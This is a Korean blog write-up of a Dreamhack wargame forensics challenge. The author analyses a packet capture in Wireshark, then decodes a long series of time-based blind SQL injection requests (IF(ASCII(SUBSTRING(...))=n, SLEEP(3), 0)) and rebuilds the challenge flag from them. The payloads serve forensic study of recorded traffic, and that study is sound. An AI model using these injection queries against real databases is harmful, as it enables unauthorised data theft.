sleepingshark | 워게임 | Dreamhack
sleepingshark
Do shark sleep?
dreamhack.io
http 프로토콜에 flag 라는 글자가 있음
이 url을 디코딩하면 ..
(이건 Time-based Blind SQL Injection 공격을 시도한 HTTP 요청.
이 URI는 한 글자를 확인하는 데 사용하는 도구인거고. 전체 flag를 얻기 위해 여러 번 반복해서 분석하거나 자동화해야 한다.)
_ws.col.info == "POST /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),34,1))=45, SLEEP(3), 0) HTTP/1.1 "
분석:
SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),34,1)
→ flag의 34번째 글자를 추출
ASCII(...) = 45
→ 그 글자의 ASCII 코드가 45인지 검사 (45 문자 : 하이픈(-))
IF(..., SLEEP(3), 0)
→ 맞으면 3초 기다리고, 아니면 바로 응답
즉, "플래그의 34번째 문자가 - 인지?" 확인
wireshark에서 SLEEP(3)이 실행된 요청들만 필터링 (tcp.time_delta > 3)
이거 URI 하나하나 다 디코딩해서 플래그 찾는 거..
URI
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C1%2C1%29%29%3D71%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C19%2C1%29%29%3D95%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C2%2C1%29%29%3D111%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C10%2C1%29%29%3D66%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C7%2C1%29%29%3D109%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C28%2C1%29%29%3D110%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C6%2C1%29%29%3D49%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C9%2C1%29%29%3D95%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C15%2C1%29%29%3D95%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C16%2C1%29%29%3D53%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C30%2C1%29%29%3D119%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C33%2C1%29%29%3D104%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C32%2C1%29%29%3D55%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C4%2C1%29%29%3D123%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C31%2C1%29%29%3D73%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C23%2C1%29%29%3D51%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C13%2C1%29%29%3D51%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C26%2C1%29%29%3D105%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C18%2C1%29%29%3D76%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C11%2C1%29%29%3D52%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C22%2C1%29%29%3D106%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C12%2C1%29%29%3D115%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C20%2C1%29%29%3D73%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C39%2C1%29%29%3D125%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C36%2C1%29%29%3D99%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C25%2C1%29%29%3D55%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C14%2C1%29%29%3D100%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C5%2C1%29%29%3D84%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C34%2C1%29%29%3D95%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C8%2C1%29%29%3D69%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C21%2C1%29%29%3D110%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C17%2C1%29%29%3D81%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C35%2C1%29%29%3D80%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C3%2C1%29%29%3D78%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C29%2C1%29%29%3D95%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C38%2C1%29%29%3D112%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C27%2C1%29%29%3D48%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C24%2C1%29%29%3D99%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C37%2C1%29%29%3D52%2C%20SLEEP%283%29%2C%200%29]
디코딩하면
아래와 같고 , 노란색 자리에 있는 숫자가 순서라서 순서대로
빨간색 자리의 ASCII 코드값을 나열해야 함.
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),1,1))=71, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),19,1))=95, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),2,1))=111, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),10,1))=66, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),7,1))=109, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),28,1))=110, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),6,1))=49, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),9,1))=95, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),15,1))=95, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),16,1))=53, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),30,1))=119, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),33,1))=104, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),32,1))=55, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),4,1))=123, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),31,1))=73, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),23,1))=51, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),13,1))=51, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),26,1))=105, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),18,1))=76, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),11,1))=52, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),22,1))=106, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),12,1))=115, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),20,1))=73, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),39,1))=125, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),36,1))=99, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),25,1))=55, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),14,1))=100, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),5,1))=84, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),34,1))=95, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),8,1))=69, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),21,1))=110, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),17,1))=81, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),35,1))=80, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),3,1))=78, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),29,1))=95, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),38,1))=112, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),27,1))=48, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),24,1))=99, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),37,1))=52, SLEEP(3), 0)]
정리하면
| 순서 | ASCII 코드 | 문자 |
| 1 | 71 | G |
| 2 | 111 | o |
| 3 | 78 | N |
| 4 | 123 | { |
| 5 | 84 | T |
| 6 | 49 | 1 |
| 7 | 109 | m |
| 8 | 69 | E |
| 9 | 95 | _ |
| 10 | 66 | B |
| 11 | 52 | 4 |
| 12 | 115 | s |
| 13 | 51 | 3 |
| 14 | 100 | d |
| 15 | 95 | _ |
| 16 | 53 | 5 |
| 17 | 81 | Q |
| 18 | 76 | L |
| 19 | 95 | _ |
| 20 | 73 | I |
| 21 | 110 | n |
| 22 | 106 | j |
| 23 | 51 | 3 |
| 24 | 99 | c |
| 25 | 55 | 7 |
| 26 | 105 | i |
| 27 | 48 | 0 |
| 28 | 110 | n |
| 29 | 95 | _ |
| 30 | 119 | w |
| 31 | 73 | I |
| 32 | 55 | 7 |
| 33 | 104 | h |
| 34 | 95 | _ |
| 35 | 80 | P |
| 36 | 99 | c |
| 37 | 52 | 4 |
| 38 | 112 | p |
| 39 | 125 | } |
플래그:
GoN{T1mE_B4s3d_5QL_Inj3c7i0n_wI7h_Pc4p}
'드림핵' 카테고리의 다른 글
| [드림핵] 워게임 Enc-JPG (3) | 2025.08.05 |
|---|---|
| [드림핵] 워게임 structure-based carving (4) | 2025.07.28 |
| [드림핵] 윈도우 포렌식 - 레지스트리, find the USB, Autoruns (0) | 2025.05.20 |
| [드림핵] 파일 시스템 + 실습 (2) | 2025.05.13 |
| [드림핵] 디지털 데이터와 디지털 장치 (6) | 2025.04.08 |
